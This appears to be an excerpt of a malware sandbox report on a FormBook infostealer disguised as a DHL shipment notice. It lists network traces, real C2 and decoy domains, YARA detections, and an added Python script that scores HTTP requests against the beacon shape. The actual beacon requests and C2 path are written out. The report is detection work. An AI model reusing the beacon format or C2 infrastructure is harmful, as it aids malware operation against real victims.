    Data Raw: 62 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 6f 67 67 65 72 20 69 73 20 61 20 62 6c 6f 67 20 70 75 62 6c 69 73 68 69 6e 67 20 74 6f 6f 6c 20 66 72 6f 6d 20 47 6f 6f 67 6c 65 20 66 6f 72 20 65 61 73 69 6c 79 20 73 68 61 72 69 6e 67 20 79 6f 75 72 20 74 68 6f 75 67 68 74 73 20 77 69 74 68 20 74 68 65 20 77 6f 72 6c 64 2e 20 42 6c 6f 67 67 65 72 20 6d 61 6b 65 73 20 69 74 20 73 69 6d 70 6c 65 20 74 6f 20 70 6f 73 74 20 74 65 78 74 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 76 69 64 65 6f 20 6f 6e 74 6f 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 20 6f 72 20 74 65 61 6d 20 62 6c 6f 67 2e 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 6f 67 67 65 72 2c 20 62 6c 6f 67 73 70 6f 74 2c 20 62 6c 6f 67 2c 20 62 6c 6f 67 67 65 72 2e 63 6f 6d 2c 20 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2c 20 70 65 72 73 6f 6e 61 6c 20 62 6c 6f 67 2c 20 77 65 62 6c 6f 67 2c 20 63 72 65 61 74 65 20 62 6c 6f 67 2c 20
6e 65 77 20 62 6c 6f 67 22 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 23 68 6f 6d 65 42 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 76 2d 63 73 73 2f 33 38 39 36 35 35 38 36 37 33 2d 6e 65 77 5f 75 69 5f 73 74 61 74 69 63 5f 70 61 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 65 6e 20 72 62 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 13 May 2022 14:10:57 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    X-Sorting-Hat-PodId: 250
    X-Sorting-Hat-ShopId: 64045383931
    X-Dc: gcp-europe-west1
    X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
    X-XSS-Protection: 1; mode=block
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-Permitted-Cross-Domain-Policies: none
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 70abfb06ecb2917d-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70
61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ultrakill.xyz/
Source: unknown | DNS traffic detected: queries for: www.rtpholywin99.com
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
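The three GETs in this section are the FormBook beacon shape that the "HTTP GET or POST without a user agent" and "System process connects to network" signatures react to: a request from explorer.exe, the configured C2 path /amdf/, exactly two query parameters of which one (oTsXW=bHtTbh8HU) is constant across hosts and the other is a long base64-alphabet blob, only Host and Connection: close headers, a 7-byte all-zero body, and a Host taken from the decoy list rather than from the C2 entry. The block below is an added example, not Joe Sandbox or vendor code: it scores raw HTTP requests against those traits using the report's extracted configuration and pulls out the parameter shared by every request, which is the pivot for finding the same build talking to decoy hosts the sandbox never saw. The requests are constructed from the three listed above plus one benign request for contrast; the decoy list is shortened and the score threshold is a choice, not a documented value.

```python
"""Score HTTP requests against the FormBook beacon shape seen in this report.

Added example, not Joe Sandbox or vendor code. CONFIG is taken from the
report's extracted configuration (decoy list shortened); REQUESTS are
constructed from the three GETs in the Networking section plus one benign
request for contrast, not a packet capture.
"""
import re
from urllib.parse import urlsplit

CONFIG = {
    "C2 list": ["www.lgf7.com/amdf/"],
    "decoy": ["rtpholywin99.com", "keilaniclothing.com", "ultrakill.xyz", "xadazheng.com"],
}

REQUESTS = [
    (b"GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1\r\n"
     b"Host: www.rtpholywin99.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    (b"GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1\r\n"
     b"Host: www.keilaniclothing.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    (b"GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1\r\n"
     b"Host: www.ultrakill.xyz\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    (b"GET /amdf/index.html HTTP/1.1\r\nHost: www.example.com\r\n"   # benign, constructed
     b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"),
]

BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}=*$")   # long base64-alphabet value


def parse_request(raw):
    """-> (method, target, {lowercased header: value}, body)"""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def raw_params(query):
    """Split a query without percent/plus decoding: '+' is data in these blobs."""
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]


def registered_domain(host):
    """Last two labels; adequate for the .com/.xyz names in this configuration."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def config_paths(config):
    return {"/" + entry.partition("/")[2] for entry in config["C2 list"]}


def config_domains(config):
    hosts = [entry.partition("/")[0] for entry in config["C2 list"]] + config["decoy"]
    return {registered_domain(h) for h in hosts}


def beacon_reasons(raw, config):
    """Every FormBook-beacon trait the request exhibits."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    params = raw_params(url.query)
    reasons = []
    if method == "GET" and url.path in config_paths(config):
        reasons.append("path equals configured C2 URI path")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if registered_domain(headers.get("host", "")) in config_domains(config):
        reasons.append("Host is a configured C2 or decoy domain")
    if len(params) == 2 and any(BLOB_RE.match(v) for _, v in params):
        reasons.append("two query parameters, one long base64-like blob")
    if method == "GET" and body and set(body) == {0}:
        reasons.append(f"GET carrying a {len(body)}-byte NUL body")
    return reasons


def is_beacon(raw, config, threshold=4):
    """Threshold is a tuning choice: four of six traits, so one missing header
    (a future build adding a User-Agent, say) does not hide the beacon."""
    return len(beacon_reasons(raw, config)) >= threshold


def shared_param(raws):
    """Query (key, value) pairs present in every request: the per-build
    constant (here oTsXW=bHtTbh8HU) that ties the decoy hosts together."""
    common = None
    for raw in raws:
        _, target, _, _ = parse_request(raw)
        params = set(raw_params(urlsplit(target).query))
        common = params if common is None else common & params
    return common or set()


if __name__ == "__main__":
    for raw in REQUESTS:
        _, _, headers, _ = parse_request(raw)
        print(headers.get("host"), is_beacon(raw, CONFIG), beacon_reasons(raw, CONFIG))
    print("shared:", shared_param(REQUESTS[:3]))
```

The host-based trait is the least durable one, since a new build ships a new decoy list; the shape traits (path, missing User-Agent, two parameters with one blob, NUL body) are what carry over, and `shared_param` gives the per-build token to search proxy logs for once a single beacon has been confirmed.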

E-Banking Fraud

Source: Yara match | File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
